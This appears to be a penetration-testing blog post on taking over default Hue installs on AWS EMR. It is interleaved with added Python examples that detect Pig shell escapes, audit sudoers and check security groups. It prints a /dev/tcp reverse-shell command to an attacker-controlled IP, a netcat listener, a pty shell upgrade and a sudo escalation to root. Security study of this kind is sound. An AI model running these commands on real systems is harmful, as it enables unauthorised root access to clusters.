Wednesday, July 8, 2015

Pwning Hadoop User Experience a.k.a Hue in AWS

This is the first in a series of blog posts on discovering and hacking cloud-based systems and services. Today we get to take a look at Big Data.

During a recent engagement we found some interesting default installations. It appears that some AWS Elastic MapReduce (EMR) Amazon Machine Images (AMIs) have a default installation of the Hadoop User Experience (HUE) that listens on port 8888. During the initial recon we were able to enumerate quite a few of these servers that had 8888 open and saw that by default, Hue loads a page that is expecting a user to create an administrator account for the Hadoop server (and sometimes cluster) that it is running on. So we logged in and created admin accounts on all of the Hue servers that were in the target scope.

One of the cool things about Hue is that it allows for the administration and creation of Hadoop MapReduce jobs without ever having to mess with a pesky command line. Hue also has a GUI interface to Apache Pig. This option is accessed in Hue by clicking on Query Editors and selecting Pig.

This GUI interface runs commands through Pig's grunt shell. Grunt also allows running operating-system commands when the command is prefaced with sh. Running sh whoami showed that the job was executing as the hadoop user. So we decided to see if we could pop a shell. One of my favorite ways to get a reverse shell is the old /dev/tcp trick: by running one simple command in the Pig GUI it is possible to call a reverse shell back to a server you control. On the server you control, first set up your netcat listener by running:

 nc -l 5555  

On the Hue server enter the following command in the Pig Editor: 

 sh bash -i >& /dev/tcp/$YOUR_IP/5555 0>&1 
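From the defender's side, the thing to catch is the grunt shell escape itself. As an added example (not code from the original post), here is a small Python detector that can be run over Pig scripts submitted through Hue, or over an exported query history, to flag sh and fs escapes and the /dev/tcp reverse-shell pattern shown above. The sample script is constructed; where Hue keeps its saved queries and how you export them is left as an assumption.

```python
import re

# grunt lines that hand their argument to another shell: "sh" runs an OS
# command, "fs" runs an HDFS shell command (flagged at lower severity).
SHELL_ESCAPE = re.compile(r"^\s*(sh|fs)\s+(.+)$", re.IGNORECASE)

# Narrow patterns for a shell escape that is doing something other than
# ordinary data preparation. Extend the list from your own incident data.
SUSPICIOUS = [
    (re.compile(r"/dev/(tcp|udp)/"), "bash network redirection (/dev/tcp)"),
    (re.compile(r"\b(nc|ncat|netcat|socat)\b"), "netcat/socat invocation"),
    (re.compile(r"pty\.spawn\("), "pty shell upgrade"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to a shell"),
    (re.compile(r"\bsudo\b"), "sudo from a job"),
]


def scan_pig_script(text):
    """Return one finding per line that escapes from grunt to another shell.

    severity: high   = shell escape plus a suspicious pattern
              medium = plain OS shell escape (sh ...)
              low    = HDFS shell escape (fs ...)
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = SHELL_ESCAPE.match(line)
        if not m:
            continue
        keyword, cmd = m.group(1).lower(), m.group(2).strip()
        reasons = [label for pat, label in SUSPICIOUS if pat.search(cmd)]
        if reasons:
            severity = "high"
        elif keyword == "sh":
            severity = "medium"
        else:
            severity = "low"
        findings.append({"line": lineno, "keyword": keyword, "command": cmd,
                         "severity": severity, "reasons": reasons})
    return findings


# Constructed sample: a benign job followed by the lines quoted in the post.
SAMPLE_SCRIPT = """\
-- constructed sample script, not a real job
A = LOAD '/data/logs' USING PigStorage('\\t');
fs -ls /data/logs
sh echo "prep done"
sh whoami
sh bash -i >& /dev/tcp/203.0.113.10/5555 0>&1
"""

if __name__ == "__main__":
    for f in scan_pig_script(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['severity']:6} {f['keyword']} {f['command']}"
              + (f"  <- {', '.join(f['reasons'])}" if f["reasons"] else ""))
```

Any sh escape at all is worth alerting on in most analytics environments; the medium tier exists so that a team which legitimately uses sh for housekeeping can still get a loud signal on the high tier.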

After the Hue server sends the job out to one of its cluster workers you should see a remote shell connect back to the server you control. This is a non-interactive shell, so we need a way to upgrade it before we can see what our sudo privileges are. Most modern Linux operating systems have Python installed by default, so we can take advantage of some Python magic by running:

 python -c 'import pty; pty.spawn("/bin/sh")'  

This imports Python's pty module and spawns sh inside a pseudo-terminal, giving us an interactive shell. Now we can try sudo:

 sudo -s  

The AWS Hue install makes this part nice and easy for us by including the Hadoop user in /etc/sudoers as:

 hadoop ALL = NOPASSWD: ALL   

So now we have a full root shell on this box. Keep in mind that this will usually not be root on the Hue server you ran the initial command on, but rather on one of the Hadoop cluster workers that is connected to the Hue box. So repeating the above steps a few times can actually get you more root shells on different boxes in the Hadoop cluster.
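The sudoers entry above is the whole reason a job running as hadoop turns into root, and it is easy to audit for. As an added example (not from the original post), here is a Python parser for sudoers user specifications that flags any account granted ALL commands with NOPASSWD. The sample file is constructed to resemble the entry quoted above; the parser deliberately does not expand aliases or follow #includedir, which is an assumption you may need to lift for your own hosts.

```python
import re

# One sudoers user specification:
#   <user|%group> <hosts> = [(runas)] [TAG: ...] <command list>
SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG = re.compile(r"^([A-Z]+):\s*(.*)$")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias",
                 "Runas_Alias", "@include")


def parse_sudoers(text):
    """Parse user specifications; Defaults, aliases, comments and includes are skipped.

    Good enough for an audit; it does not expand aliases or follow #includedir.
    """
    entries = []
    for raw in text.splitlines():
        stripped = raw.strip()
        if stripped.startswith("#") or stripped.startswith(SKIP_PREFIXES):
            continue          # comments, #include/#includedir, Defaults, aliases
        line = stripped.split("#", 1)[0].strip()   # drop a trailing comment
        m = SPEC.match(line)
        if not m:
            continue
        rest, tags = m.group("rest"), []
        while True:           # NOPASSWD:, SETENV:, NOEXEC: ... precede the commands
            t = TAG.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = t.group(2)
        entries.append({
            "who": m.group("who"), "hosts": m.group("hosts"),
            "runas": m.group("runas"), "tags": tags,
            "commands": [c.strip() for c in rest.split(",")],
        })
    return entries


def find_passwordless_all(entries):
    """Specs granting every command without a password: any code running as
    that account (here, the Hadoop job runner) becomes root with 'sudo -s'."""
    return [e for e in entries
            if "NOPASSWD" in e["tags"] and "ALL" in e["commands"]]


# Constructed sample, modelled on the entry quoted in the post.
SAMPLE_SUDOERS = """\
# constructed /etc/sudoers, not copied from a real host
Defaults    env_reset
root    ALL=(ALL:ALL) ALL
%wheel  ALL=(ALL) ALL
hadoop ALL = NOPASSWD: ALL
deploy  ALL = (root) NOPASSWD: /usr/bin/systemctl restart app, /usr/bin/journalctl
#includedir /etc/sudoers.d
"""

if __name__ == "__main__":
    for e in find_passwordless_all(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{e['who']}: passwordless ALL on {e['hosts']}")
```

The deploy entry in the sample shows the shape a service account's sudo access should take: a short, explicit command list rather than ALL, so that a compromised job runner cannot simply run sudo -s.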

We did notice that a few of the Hue installs did not have worker systems configured and this caused the reverse shell to hang and not work. In addition, this attack is also dependent on poor security group configurations so YMMV. 
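Since the whole chain starts with port 8888 being reachable from the internet, the cheapest fix is on the security group. As an added example (not from the original post), here is a Python audit over security-group data in the shape that EC2 DescribeSecurityGroups returns, reporting every rule that lets 0.0.0.0/0 or ::/0 reach the Hue port. The group ids and names below are constructed; in live use the list comes from boto3's describe_security_groups() call, which this example does not make so that it runs offline.

```python
HUE_PORT = 8888
ANYWHERE = {"0.0.0.0/0", "::/0"}


def rule_covers_port(perm, port):
    """True if an IpPermissions entry admits TCP traffic to `port`."""
    proto = perm.get("IpProtocol")
    if proto == "-1":                      # "all traffic"
        return True
    if proto not in ("tcp", "6"):
        return False
    return perm.get("FromPort", 0) <= port <= perm.get("ToPort", 65535)


def world_sources(perm):
    """CIDR sources on the rule that mean 'the whole internet'."""
    cidrs = [r.get("CidrIp") for r in perm.get("IpRanges", [])]
    cidrs += [r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])]
    return [c for c in cidrs if c in ANYWHERE]


def audit_hue_exposure(groups, port=HUE_PORT):
    """Return one finding per (group, rule, world-open source) that reaches `port`."""
    findings = []
    for g in groups:
        for perm in g.get("IpPermissions", []):
            if not rule_covers_port(perm, port):
                continue
            for src in world_sources(perm):
                findings.append({
                    "group": g["GroupId"], "name": g.get("GroupName"),
                    "source": src, "protocol": perm["IpProtocol"],
                    "ports": (perm.get("FromPort"), perm.get("ToPort")),
                })
    return findings


# Constructed sample in the shape of DescribeSecurityGroups output; the group
# ids and names are made up for this example.
SAMPLE_GROUPS = [
    {"GroupId": "sg-0000000000000001", "GroupName": "emr-master-constructed",
     "IpPermissions": [
         {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
          "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
         {"IpProtocol": "tcp", "FromPort": 8888, "ToPort": 8888,
          "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
         {"IpProtocol": "tcp", "FromPort": 0, "ToPort": 65535,
          "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []},
     ]},
    {"GroupId": "sg-0000000000000002", "GroupName": "hue-restricted-constructed",
     "IpPermissions": [
         {"IpProtocol": "tcp", "FromPort": 8888, "ToPort": 8888,
          "IpRanges": [{"CidrIp": "198.51.100.0/24"}], "Ipv6Ranges": []},
     ]},
    {"GroupId": "sg-0000000000000003", "GroupName": "wide-open-constructed",
     "IpPermissions": [
         {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
     ]},
]

if __name__ == "__main__":
    # Live use: groups = boto3.client("ec2").describe_security_groups()["SecurityGroups"]
    for f in audit_hue_exposure(SAMPLE_GROUPS):
        print(f"{f['group']} ({f['name']}): port {HUE_PORT} open to "
              f"{f['source']} via {f['protocol']} {f['ports']}")
```

The second group in the sample is the configuration you want: Hue reachable only from a named office or VPN range, and the all-traffic rule in the third group is caught even though it never mentions 8888.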

Next up looting secrets from AWS hosts using the AWS Metadata Service...